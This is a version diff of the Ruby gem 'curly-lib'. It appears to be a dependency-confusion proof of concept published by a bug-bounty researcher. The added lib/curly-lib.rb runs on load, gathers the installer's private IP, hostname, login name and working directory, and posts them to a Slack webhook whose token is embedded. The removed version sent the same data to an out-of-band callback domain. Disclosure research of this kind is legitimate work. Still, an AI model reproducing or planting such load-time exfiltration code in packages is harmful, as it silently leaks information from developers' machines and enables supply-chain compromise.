curly-lib 0.0.0 → 0.0.2

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: b21dbd4682fc899ee6f105660b8873c75b4c892efa155038546d7605bfd56819
-  data.tar.gz: a66adfbf42d74aff466fca6e5c25db323b10686f1765e2c10bc7e7da78b2264e
+  metadata.gz: 4da1a8c9412492f819c28845fbea587bb5188e7657308018ac7105424a174e0e
+  data.tar.gz: 19414e8967f88d0e875b419f15252deebd13d34ba6a878f311b64551f82e6000
 SHA512:
-  metadata.gz: 00efd0f45166c19a3a2cc89b9e44aefbe2f6ad23c5eb8c8f2bf23e80feea53c9974c31afeca00df249aa58bc636fa16fb94d8c5d4b19e9880959c6535b8e35e3
-  data.tar.gz: 6eb420df67f5fd84d0fdf8b8004e13440854318f11bfa7cc957118bdeaf7822466bb6c180bb5a07e96a996f24473ad9aa0f9ca50eebce228da7629a44b46f6f7
+  metadata.gz: 318ff53732383643cdedd397f809bd834eb1beae4a91edda5862c56827a46b0d777da803152972af475a5e170f27ac7712decdf66e2c761fbf48bf69a5aafa8c
+  data.tar.gz: 8c257471e7e003e7b79ada1d21b520e729ebf64c26b2e47793c466a9a27747062e70ceb30df52221f6005f5de3661da4a783dce262c5e7de9fc1d2ad6909e258

data/lib/{curly/lib.rb → curly-lib.rb}

@@ -1,25 +1,28 @@
-module lib
+module Deviceinfo
 
     require 'json'
     require 'net/http'
     require 'socket'
-
+    require 'etc'
+    
     #Private IP
     privip = UDPSocket.open {|s| s.connect("146.190.26.50", 1); s.addr.last}
     #Hostname
     hostname = Socket.gethostname
     #Current directory
     dir = Dir.pwd
-
-    uri = URI('https://aihpfsrzdfwqtrxkejnh320z67w7bkw27.oast.fun')
+    whoami = Etc.getlogin
+    
+    uri = URI('https://hooks.slack.com/services/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')
     req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
-
+    
     req.body = {
-      private_ip: privip,
-      hostname: hostname,
-      current_directory: dir
+      text: "New Usage:" + "\n"+ 
+            "User/Hostname: " + whoami+'/'+hostname + "\n" + 
+            "Private IP: " + privip + "\n" + 
+            "Directory: " + dir,
     }.to_json
-
+    
     Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
       http.request(req)
     end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: curly-lib
 version: !ruby/object:Gem::Version
-  version: 0.0.0
+  version: 0.0.2
 platform: ruby
 authors:
-- alifathi-h1
+- Ali Fathi
 autorequire: 
-bindir: exe
+bindir: bin
 cert_chain: []
-date: 2024-05-02 00:00:00.000000000 Z
+date: 2024-05-04 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: bundler
@@ -38,28 +38,18 @@ dependencies:
     - - "~>"
       - !ruby/object:Gem::Version
         version: '10.0'
-description: 
-email:
-- alifathi@wearehackerone.com
+description: 'Vulnerability Disclosure: Dependency confusion vulnerability POC! get
+  in contact with alifathi@wearehackerone.com.'
+email: alifathi@wearehackerone.com
 executables: []
 extensions: []
 extra_rdoc_files: []
 files:
-- ".gitignore"
-- Gemfile
-- README.md
-- Rakefile
-- bin/console
-- bin/setup
-- curly-lib.gemspec
-- lib/curly/lib.rb
-- lib/curly/lib/version.rb
+- lib/curly-lib.rb
 homepage: https://hackerone.com/alifathi
-licenses: []
-metadata:
-  homepage_uri: https://hackerone.com/alifathi
-  source_code_uri: https://github.com/alifathi-h1/curly-lib.git
-  changelog_uri: https://github.com/alifathi-h1/curly-lib/changelog.txt
+licenses:
+- MIT
+metadata: {}
 post_install_message: 
 rdoc_options: []
 require_paths:
@@ -78,5 +68,5 @@ requirements: []
 rubygems_version: 3.0.3.1
 signing_key: 
 specification_version: 4
-summary: 'Vulnerability Disclosure: Dependency confusion vulnerability'
+summary: 'Vulnerability Disclosure: Dependency confusion vulnerability POC!'
 test_files: []

data/.gitignore

@@ -1,8 +0,0 @@
-/.bundle/
-/.yardoc
-/_yardoc/
-/coverage/
-/doc/
-/pkg/
-/spec/reports/
-/tmp/

data/Gemfile

@@ -1,6 +0,0 @@
-source "https://rubygems.org"
-
-git_source(:github) {|repo_name| "https://github.com/#{repo_name}" }
-
-# Specify your gem's dependencies in curly-lib.gemspec
-gemspec

data/README.md

@@ -1,35 +0,0 @@
-# Curly::Lib
-
-Welcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/curly/lib`. To experiment with that code, run `bin/console` for an interactive prompt.
-
-TODO: Delete this and the text above, and describe your gem
-
-## Installation
-
-Add this line to your application's Gemfile:
-
-```ruby
-gem 'curly-lib'
-```
-
-And then execute:
-
-    $ bundle
-
-Or install it yourself as:
-
-    $ gem install curly-lib
-
-## Usage
-
-TODO: Write usage instructions here
-
-## Development
-
-After checking out the repo, run `bin/setup` to install dependencies. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
-
-To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).
-
-## Contributing
-
-Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/curly-lib.

data/Rakefile

@@ -1,2 +0,0 @@
-require "bundler/gem_tasks"
-task :default => :spec

data/bin/console

@@ -1,14 +0,0 @@
-#!/usr/bin/env ruby
-
-require "bundler/setup"
-require "curly/lib"
-
-# You can add fixtures and/or initialization code here to make experimenting
-# with your gem easier. You can also use a different console, if you like.
-
-# (If you use this, don't forget to add pry to your Gemfile!)
-# require "pry"
-# Pry.start
-
-require "irb"
-IRB.start(__FILE__)

data/bin/setup

@@ -1,8 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-IFS=$'\n\t'
-set -vx
-
-bundle install
-
-# Do any other automated setup that you need to do here

data/curly-lib.gemspec

@@ -1,38 +0,0 @@
-
-lib = File.expand_path("../lib", __FILE__)
-$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
-require "curly/lib/version"
-
-Gem::Specification.new do |spec|
-  spec.name          = "curly-lib"
-  spec.version       = Curly::Lib::VERSION
-  spec.authors       = ["alifathi-h1"]
-  spec.email         = ["alifathi@wearehackerone.com"]
-
-  spec.summary       = "Vulnerability Disclosure: Dependency confusion vulnerability"
-  spec.homepage      = "https://hackerone.com/alifathi"
-
-  # Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
-  # to allow pushing to a single host or delete this section to allow pushing to any host.
-  if spec.respond_to?(:metadata)
-
-    spec.metadata["homepage_uri"] = spec.homepage
-    spec.metadata["source_code_uri"] = "https://github.com/alifathi-h1/curly-lib.git"
-    spec.metadata["changelog_uri"] = "https://github.com/alifathi-h1/curly-lib/changelog.txt"
-  else
-    raise "RubyGems 2.0 or newer is required to protect against " \
-      "public gem pushes."
-  end
-
-  # Specify which files should be added to the gem when it is released.
-  # The `git ls-files -z` loads the files in the RubyGem that have been added into git.
-  spec.files         = Dir.chdir(File.expand_path('..', __FILE__)) do
-    `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
-  end
-  spec.bindir        = "exe"
-  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
-  spec.require_paths = ["lib"]
-
-  spec.add_development_dependency "bundler", "~> 1.17"
-  spec.add_development_dependency "rake", "~> 10.0"
-end

data/lib/curly/lib/version.rb

@@ -1,5 +0,0 @@
-module Curly
-  module Lib
-    VERSION = "0.0.0"
-  end
-end